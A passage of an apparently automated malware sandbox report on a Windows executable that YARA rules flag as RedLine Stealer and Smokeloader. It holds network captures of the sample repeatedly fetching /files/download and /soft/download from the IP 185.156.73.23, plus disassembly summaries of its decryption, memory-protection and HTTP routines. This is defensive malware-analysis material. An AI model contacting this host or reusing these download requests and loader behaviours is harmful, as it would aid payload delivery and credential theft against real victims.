                                   Dec 20, 2024 16:37:52.755369902 CET | 1236 | IN | Data Raw: bf 33 41 12 5b 52 91 a7 94 e0 e5 21 5d 8d 93 1b 30 af be 5e 8f 7b 94 24 bc 87 3d 50 74 38 00 cd a5 7b 35 ab 90 44 11 e5 40 7a 29 92 1d b3 4a 52 10 d4 8d 43 b3 ff 3c 6b 20 35 4a e1 86 bc f7 99 68 67 d7 c4 fb c8 a1 b9 38 b1 27 61 b3 3c e2 f9 cc 06
                                  Data Ascii: 3A[R!]0^{$=Pt8{5D@z)JRC<k 5Jhg8'a<dIC2ui$wtHLnc}QJ4;[r|^%<t5S[AIa+48*xs30SxNZCPH3U"~6GxeZE3 SZF&=Qt`d^u
                                   Dec 20, 2024 16:37:52.755616903 CET | 1236 | IN | Data Raw: c8 a2 6d 52 66 a8 66 51 d1 c3 c9 87 9b d8 0b 44 57 eb 08 d8 cd bc b7 be b7 f1 4b 89 c0 b1 44 55 84 bc 8d 8d 36 2c c3 07 89 a5 46 50 8a ac fe f3 ba 23 4d 4f e4 0f 27 9f e1 11 07 f4 e0 e7 17 61 0e 07 54 3f cc 3f ae 3a 77 4d e4 44 61 15 b1 b3 97 25
                                  Data Ascii: mRffQDWKDU6,FP#MO'aT??:wMDa%k;3?Bc| yp`yzlSniVN(Bv}:XsOf.~zToX8n K$:D6Z%NNng=t+L~6DtFX[a/[
                                   Dec 20, 2024 16:37:52.763876915 CET | 1236 | IN | Data Raw: d3 59 d3 30 18 53 4e 25 dc 9e 95 b9 da a6 3e 71 c0 45 79 32 7a f2 9f 43 ae e4 0b 25 8a bf 44 da e3 4d 77 72 50 8f 9d 18 42 0f 58 f1 b2 46 1d e6 97 70 c7 39 3b b2 a3 64 90 74 04 57 77 50 fc 49 1c ac 46 a7 37 5f 66 b7 fd b1 37 84 39 3f 7b d6 9b 57
                                  Data Ascii: Y0SN%>qEy2zC%DMwrPBXFp9;dtWwPIF7_f79?{WdA_9qH1^S-;0_lc%.I5[j-(HK&c?EUXTVnMXyU47=`L4^9\7am:i`v{]
                                   Dec 20, 2024 16:37:53.258409977 CET | 395 | OUT | GET /files/download HTTP/1.1
                                  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                  User-Agent: C
                                  Host: 185.156.73.23
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                   Dec 20, 2024 16:37:53.790546894 CET | 203 | IN | HTTP/1.1 200 OK
                                  Date: Fri, 20 Dec 2024 15:37:53 GMT
                                  Server: Apache/2.4.52 (Ubuntu)
                                  Content-Length: 1
                                  Keep-Alive: timeout=5, max=97
                                  Connection: Keep-Alive
                                  Content-Type: text/html; charset=UTF-8
                                  Data Raw: 30
                                  Data Ascii: 0
                                   Dec 20, 2024 16:37:55.819197893 CET | 395 | OUT | GET /files/download HTTP/1.1
                                  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                  User-Agent: C
                                  Host: 185.156.73.23
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                   Dec 20, 2024 16:37:56.648529053 CET | 203 | IN | HTTP/1.1 200 OK
                                  Date: Fri, 20 Dec 2024 15:37:56 GMT
                                  Server: Apache/2.4.52 (Ubuntu)
                                  Content-Length: 1
                                  Keep-Alive: timeout=5, max=96
                                  Connection: Keep-Alive
                                  Content-Type: text/html; charset=UTF-8
                                  Data Raw: 30
                                  Data Ascii: 0
                                   Dec 20, 2024 16:37:58.662985086 CET | 395 | OUT | GET /files/download HTTP/1.1
                                  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                  User-Agent: C
                                  Host: 185.156.73.23
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                   Dec 20, 2024 16:37:59.193500042 CET | 203 | IN | HTTP/1.1 200 OK
                                  Date: Fri, 20 Dec 2024 15:37:58 GMT
                                  Server: Apache/2.4.52 (Ubuntu)
                                  Content-Length: 1
                                  Keep-Alive: timeout=5, max=95
                                  Connection: Keep-Alive
                                  Content-Type: text/html; charset=UTF-8
                                  Data Raw: 30
                                  Data Ascii: 0
                                   Dec 20, 2024 16:38:01.209920883 CET | 395 | OUT | GET /files/download HTTP/1.1
                                  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                  User-Agent: C
                                  Host: 185.156.73.23
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                   Dec 20, 2024 16:38:02.036369085 CET | 203 | IN | HTTP/1.1 200 OK
                                  Date: Fri, 20 Dec 2024 15:38:01 GMT
                                  Server: Apache/2.4.52 (Ubuntu)
                                  Content-Length: 1
                                  Keep-Alive: timeout=5, max=94
                                  Connection: Keep-Alive
                                  Content-Type: text/html; charset=UTF-8
                                  Data Raw: 30
                                  Data Ascii: 0
                                   Dec 20, 2024 16:38:04.053390026 CET | 395 | OUT | GET /files/download HTTP/1.1
                                  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                  User-Agent: C
                                  Host: 185.156.73.23
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                   Dec 20, 2024 16:38:04.619503975 CET | 203 | IN | HTTP/1.1 200 OK
                                  Date: Fri, 20 Dec 2024 15:38:04 GMT
                                  Server: Apache/2.4.52 (Ubuntu)
                                  Content-Length: 1
                                  Keep-Alive: timeout=5, max=93
                                  Connection: Keep-Alive
                                  Content-Type: text/html; charset=UTF-8
                                  Data Raw: 30
                                  Data Ascii: 0
                                   Dec 20, 2024 16:38:06.631625891 CET | 395 | OUT | GET /files/download HTTP/1.1
                                  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                  User-Agent: C
                                  Host: 185.156.73.23
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                   Dec 20, 2024 16:38:07.462344885 CET | 203 | IN | HTTP/1.1 200 OK
                                  Date: Fri, 20 Dec 2024 15:38:07 GMT
                                  Server: Apache/2.4.52 (Ubuntu)
                                  Content-Length: 1
                                  Keep-Alive: timeout=5, max=92
                                  Connection: Keep-Alive
                                  Content-Type: text/html; charset=UTF-8
                                  Data Raw: 30
                                  Data Ascii: 0


                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                   1 | 192.168.2.5 | 49839 | 185.156.73.23 | 80 | 4128 | C:\Users\user\Desktop\4kahanaK78.exe
                                   Timestamp | Bytes transferred | Direction | Data
                                   Dec 20, 2024 16:38:09.596317053 CET | 395 | OUT | GET /files/download HTTP/1.1
                                  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                  User-Agent: C
                                  Host: 185.156.73.23
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                   Dec 20, 2024 16:38:11.019649029 CET | 204 | IN | HTTP/1.1 200 OK
                                  Date: Fri, 20 Dec 2024 15:38:10 GMT
                                  Server: Apache/2.4.52 (Ubuntu)
                                  Content-Length: 1
                                  Keep-Alive: timeout=5, max=100
                                  Connection: Keep-Alive
                                  Content-Type: text/html; charset=UTF-8
                                  Data Raw: 30
                                  Data Ascii: 0


                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                   2 | 192.168.2.5 | 49848 | 185.156.73.23 | 80 | 4128 | C:\Users\user\Desktop\4kahanaK78.exe
                                   Timestamp | Bytes transferred | Direction | Data
                                   Dec 20, 2024 16:38:13.179928064 CET | 395 | OUT | GET /files/download HTTP/1.1
                                  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                  User-Agent: C
                                  Host: 185.156.73.23
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                   Dec 20, 2024 16:38:14.601825953 CET | 204 | IN | HTTP/1.1 200 OK
                                  Date: Fri, 20 Dec 2024 15:38:14 GMT
                                  Server: Apache/2.4.52 (Ubuntu)
                                  Content-Length: 1
                                  Keep-Alive: timeout=5, max=100
                                  Connection: Keep-Alive
                                  Content-Type: text/html; charset=UTF-8
                                  Data Raw: 30
                                  Data Ascii: 0


                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                   3 | 192.168.2.5 | 49856 | 185.156.73.23 | 80 | 4128 | C:\Users\user\Desktop\4kahanaK78.exe
                                   Timestamp | Bytes transferred | Direction | Data
                                   Dec 20, 2024 16:38:16.850991011 CET | 395 | OUT | GET /files/download HTTP/1.1
                                  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                  User-Agent: C
                                  Host: 185.156.73.23
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                   Dec 20, 2024 16:38:18.620090008 CET | 204 | IN | HTTP/1.1 200 OK
                                  Date: Fri, 20 Dec 2024 15:38:18 GMT
                                  Server: Apache/2.4.52 (Ubuntu)
                                  Content-Length: 1
                                  Keep-Alive: timeout=5, max=100
                                  Connection: Keep-Alive
                                  Content-Type: text/html; charset=UTF-8
                                  Data Raw: 30
                                  Data Ascii: 0


                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                   4 | 192.168.2.5 | 49865 | 185.156.73.23 | 80 | 4128 | C:\Users\user\Desktop\4kahanaK78.exe
                                   Timestamp | Bytes transferred | Direction | Data
                                   Dec 20, 2024 16:38:20.789423943 CET | 395 | OUT | GET /files/download HTTP/1.1
                                  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                  User-Agent: C
                                  Host: 185.156.73.23
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                   Dec 20, 2024 16:38:22.234945059 CET | 204 | IN | HTTP/1.1 200 OK
                                  Date: Fri, 20 Dec 2024 15:38:21 GMT
                                  Server: Apache/2.4.52 (Ubuntu)
                                  Content-Length: 1
                                  Keep-Alive: timeout=5, max=100
                                  Connection: Keep-Alive
                                  Content-Type: text/html; charset=UTF-8
                                  Data Raw: 30
                                  Data Ascii: 0


                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                   5 | 192.168.2.5 | 49874 | 185.156.73.23 | 80 | 4128 | C:\Users\user\Desktop\4kahanaK78.exe
                                   Timestamp | Bytes transferred | Direction | Data
                                   Dec 20, 2024 16:38:24.428765059 CET | 395 | OUT | GET /files/download HTTP/1.1
                                  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                  User-Agent: C
                                  Host: 185.156.73.23
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                  Timestamp:Dec 20, 2024 16:38:25.862947941 CET
                                  Bytes transferred:204
                                  Direction:IN
                                  Data:HTTP/1.1 200 OK
                                  Date: Fri, 20 Dec 2024 15:38:25 GMT
                                  Server: Apache/2.4.52 (Ubuntu)
                                  Content-Length: 1
                                  Keep-Alive: timeout=5, max=100
                                  Connection: Keep-Alive
                                  Content-Type: text/html; charset=UTF-8
                                  Data Raw: 30
                                  Data Ascii: 0


                                  Session ID:6
                                  Source IP:192.168.2.5
                                  Source Port:49886
                                  Destination IP:185.156.73.23
                                  Destination Port:80
                                  PID:4128
                                  Process:C:\Users\user\Desktop\4kahanaK78.exe
                                  Timestamp:Dec 20, 2024 16:38:29.147886038 CET
                                  Bytes transferred:394
                                  Direction:OUT
                                  Data:GET /soft/download HTTP/1.1
                                  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                  User-Agent: d
                                  Host: 185.156.73.23
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache


                                  Session ID:7
                                  Source IP:192.168.2.5
                                  Source Port:49893
                                  Destination IP:185.156.73.23
                                  Destination Port:80
                                  PID:4128
                                  Process:C:\Users\user\Desktop\4kahanaK78.exe
                                  Timestamp:Dec 20, 2024 16:38:31.709904909 CET
                                  Bytes transferred:394
                                  Direction:OUT
                                  Data:GET /soft/download HTTP/1.1
                                  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                  User-Agent: s
                                  Host: 185.156.73.23
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache


                                  Target ID:0
                                  Start time:10:37:09
                                  Start date:20/12/2024
                                  Path:C:\Users\user\Desktop\4kahanaK78.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\4kahanaK78.exe"
                                  Imagebase:0x400000
                                  File size:1'933'312 bytes
                                  MD5 hash:3C2E26D10FA55AF2E913120DF3B7EDDB
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.3307293303.0000000000D89000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                  • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                  Reputation:low
                                  Has exited:true

                                  Target ID:6
                                  Start time:10:38:30
                                  Start date:20/12/2024
                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4128 -s 1516
                                  Imagebase:0x7b0000
                                  File size:483'680 bytes
                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                    Execution Graph

                                    Execution Coverage:2.6%
                                    Dynamic/Decrypted Code Coverage:32.1%
                                    Signature Coverage:22.5%
                                    Total number of Nodes:688
                                    Total number of Limit Nodes:20

                                    Control-flow Graph

                                    APIs
                                    • SetLastError.KERNEL32(0000000D), ref: 00402C96
                                    • SetLastError.KERNEL32(000000C1), ref: 00402CD8
                                    Strings
                                    • DOS header size is not valid!, xrefs: 00402D09
                                    • DOS header is not valid!, xrefs: 00402CC6
                                    • alignedImageSize != AlignValueUp!, xrefs: 00402DB9
                                    • FileHeader.Machine != HOST_MACHINE!, xrefs: 00402D4A
                                    • ERROR_OUTOFMEMORY!, xrefs: 00402DEF
                                    • Size is not valid!, xrefs: 00402C9C
                                    • Section alignment invalid!, xrefs: 00402D5C
                                    • @, xrefs: 00402C8F
                                    • Signature != IMAGE_NT_SIGNATURE!, xrefs: 00402D38
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: ErrorLast
                                    • String ID: @$DOS header is not valid!$DOS header size is not valid!$ERROR_OUTOFMEMORY!$FileHeader.Machine != HOST_MACHINE!$Section alignment invalid!$Signature != IMAGE_NT_SIGNATURE!$Size is not valid!$alignedImageSize != AlignValueUp!
                                    • API String ID: 1452528299-393758929
                                    • Opcode ID: a7ee295ea28172196232d939963434d58e5a2b4f3baf6ecdb48b764af0884dbc
                                    • Instruction ID: 68209fb506ae9b68e90255ee0055c9910cae7d9580854ddc7816d62818b51dcc
                                    • Opcode Fuzzy Hash: a7ee295ea28172196232d939963434d58e5a2b4f3baf6ecdb48b764af0884dbc
                                    • Instruction Fuzzy Hash: 3E129C71B002159BDB14CF98D985BAEBBB5BF48304F14416AE809BB3C1D7B8ED41CB98

                                    Control-flow Graph

                                    APIs
                                    • CryptAcquireContextW.ADVAPI32(?,00000000,?,00000018,F0000000,7F5C6DB0), ref: 00403540
                                    • CryptCreateHash.ADVAPI32(?,0000800C,00000000,00000000,?), ref: 00403564
                                    • _mbstowcs.LIBCMT ref: 004035B7
                                    • CryptHashData.ADVAPI32(?,00000000,?,00000000), ref: 004035CE
                                    • GetLastError.KERNEL32 ref: 004035D8
                                    • CryptDeriveKey.ADVAPI32(?,0000660E,?,00000000,?), ref: 00403600
                                    • GetLastError.KERNEL32 ref: 0040360A
                                    • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0040361A
                                    • CryptDecrypt.ADVAPI32(?,00000000,00000000,00000000,?,00000000), ref: 004036DC
                                    • CryptDestroyKey.ADVAPI32(?), ref: 0040374E
                                    Strings
                                    • Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 0040351C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: Crypt$ContextErrorHashLast$AcquireCreateDataDecryptDeriveDestroyRelease_mbstowcs
                                    • String ID: Microsoft Enhanced RSA and AES Cryptographic Provider
                                    • API String ID: 3642901890-63410773
                                    • Opcode ID: b9aca645bf8e0e24d310163d35795d59eee685dab11f25e4e54b3c0023d62c89
                                    • Instruction ID: 057eae88fc1e8b42dc2b0b13f8460ebd140b44a30a8541124d595f3772e2d34e
                                    • Opcode Fuzzy Hash: b9aca645bf8e0e24d310163d35795d59eee685dab11f25e4e54b3c0023d62c89
                                    • Instruction Fuzzy Hash: 4D8182B1A00218AFEF248F25CC45B9ABBB9EF45304F1081BAE50DE7291DB359E858F55

                                    Control-flow Graph

                                    APIs
                                    • VirtualProtect.KERNEL32(?,?,?,?), ref: 004029F8
                                    • GetLastError.KERNEL32(00000400,?,00000000,00000000,?,?,?,?), ref: 00402A0D
                                    • FormatMessageA.KERNEL32(00001300,00000000,00000000,?,?,?,?), ref: 00402A1B
                                    • LocalAlloc.KERNEL32(00000040,?,?,?,?,?), ref: 00402A36
                                    • OutputDebugStringA.KERNEL32(00000000,?,?), ref: 00402A55
                                    • LocalFree.KERNEL32(00000000), ref: 00402A62
                                    • LocalFree.KERNEL32(?), ref: 00402A67
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: Local$Free$AllocDebugErrorFormatLastMessageOutputProtectStringVirtual
                                    • String ID: %s: %s$Error protecting memory page
                                    • API String ID: 839691724-1484484497
                                    • Opcode ID: 2c46ffc98d029cfadbc5bd6c783c679e7e34e813f473582b7efecdd829900f05
                                    • Instruction ID: 2da31f80489fd9465a3e1d2b594a5759e7c0520832ca97f04c55df17c8a78757
                                    • Opcode Fuzzy Hash: 2c46ffc98d029cfadbc5bd6c783c679e7e34e813f473582b7efecdd829900f05
                                    • Instruction Fuzzy Hash: 0831F272B00114AFDB14DF58DC44FAAB7A8FF48304F0541AAE905EB291DA75AD12CA88

                                    Control-flow Graph

                                    APIs
                                    • InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 00401905
                                    • InternetReadFile.WININET(?,00000000,000003E8,00000000), ref: 00401924
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: FileInternet$PointerRead
                                    • String ID: text
                                    • API String ID: 3197321146-999008199
                                    • Opcode ID: 87aac4e3b5ff56ab0de5e0ee71ca196cf257f89e2ae9c22cdb46c2756a6c72d5
                                    • Instruction ID: 86dcce6fdabdf1d76a3839b2d4c7acaf7fb3a9f1032210a7d38a4a94718e3fd4
                                    • Opcode Fuzzy Hash: 87aac4e3b5ff56ab0de5e0ee71ca196cf257f89e2ae9c22cdb46c2756a6c72d5
                                    • Instruction Fuzzy Hash: 7AC16B71A002189FEB25CF24CD85BEAB7B9FF48304F1041ADE509A76A1DB75AE84CF54

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 00409170: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 0040917B
                                      • Part of subcall function 00409170: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 004091B8
                                    • __Init_thread_footer.LIBCMT ref: 00404C2D
                                      • Part of subcall function 00409126: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 00409130
                                      • Part of subcall function 00409126: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00409163
                                      • Part of subcall function 00409126: RtlWakeAllConditionVariable.NTDLL ref: 004091DA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                    • String ID: DFEK
                                    • API String ID: 2296764815-757449308
                                    • Opcode ID: f5ea686ae7551739fb09ba2269fdc54c75ff8209f0bf429beda0c7ff0f9ef911
                                    • Instruction ID: a8471f465924a32413f7d6e48ccdb4296a49fee141aba0f40ec0945386ee40bc
                                    • Opcode Fuzzy Hash: f5ea686ae7551739fb09ba2269fdc54c75ff8209f0bf429beda0c7ff0f9ef911
                                    • Instruction Fuzzy Hash: 32F1CFB0D002589BEB24DF24DD4879EBBB1EB41308F1441EAD4183B2D2DB799E84CF99

                                    Control-flow Graph

                                    APIs
                                    • GetCurrentProcess.KERNEL32(?,?,0040EF0C,00000000,7591DF80,?,00000000,?,004114AD), ref: 0040EF2F
                                    • TerminateProcess.KERNEL32(00000000,?,0040EF0C,00000000,7591DF80,?,00000000,?,004114AD), ref: 0040EF36
                                    • ExitProcess.KERNEL32 ref: 0040EF48
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: Process$CurrentExitTerminate
                                    • String ID:
                                    • API String ID: 1703294689-0
                                    • Opcode ID: 0681eec8a10bae1972cdd76b7596642c5d6b23a8fea5b51096d6af8d336d3898
                                    • Instruction ID: d9b2d8b9480fbdfc0f40d30fbcce2ac7d268d3ffe56ae59340c1a79faed9bf6b
                                    • Opcode Fuzzy Hash: 0681eec8a10bae1972cdd76b7596642c5d6b23a8fea5b51096d6af8d336d3898
                                    • Instruction Fuzzy Hash: 48E08C71400108BFCF117F26CC0898A3F28FB10341B004835F804AA232CB39DD92CB58
                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00D897EE
                                    • Module32First.KERNEL32(00000000,00000224), ref: 00D8980E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3307293303.0000000000D89000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D89000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d89000_4kahanaK78.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateFirstModule32SnapshotToolhelp32
                                    • String ID:
                                    • API String ID: 3833638111-0
                                    • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                    • Instruction ID: 82d5d855f26b0286f04651267cbe68724eb49e85d12306bd4fd9144bd55bb76e
                                    • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                    • Instruction Fuzzy Hash: 9BF062312007116BD7203BB9AC9DA7EB6F8AF89725F180628F686910C0DA70E8454771
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: Sleep
                                    • String ID: emp$mixtwo
                                    • API String ID: 3472027048-2390925073
                                    • Opcode ID: 7c8f0e1ea6e5323602f9bb77927d34118e87d89025315e812fc220ab57e9b21a
                                    • Instruction ID: 72a2dd17e89226f8ccca0b0bb08db3f26db736a0bfe45ababc36bb360cb4900e
                                    • Opcode Fuzzy Hash: 7c8f0e1ea6e5323602f9bb77927d34118e87d89025315e812fc220ab57e9b21a
                                    • Instruction Fuzzy Hash: 7BF08CB160130457E710BF24ED1B71A3EA4970275CFA006ADDC601F2D2E7FB821A97EA

                                    Control-flow Graph

                                    APIs
                                    • __EH_prolog3_GS.LIBCMT ref: 1000152A
                                    • __cftof.LIBCMT ref: 10001624
                                    • InternetOpenA.WININET(?,?,?,00000000,00000000), ref: 1000163D
                                    • InternetSetOptionA.WININET(00000000,00000041,?,00000004), ref: 10001660
                                    • InternetConnectA.WININET(00000000,?,00000050,?,?,00000003,00000000,00000001), ref: 10001680
                                    • HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,80400000,00000001), ref: 100016B0
                                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 100016C9
                                    • InternetCloseHandle.WININET(00000000), ref: 100016E0
                                    • InternetCloseHandle.WININET(00000000), ref: 100016E3
                                    • InternetCloseHandle.WININET(00000000), ref: 100016E9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3309607086.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 00000000.00000002.3309587632.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                    • Associated: 00000000.00000002.3309627188.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                    • Associated: 00000000.00000002.3309646682.0000000010018000.00000004.00001000.00020000.00000000.sdmp
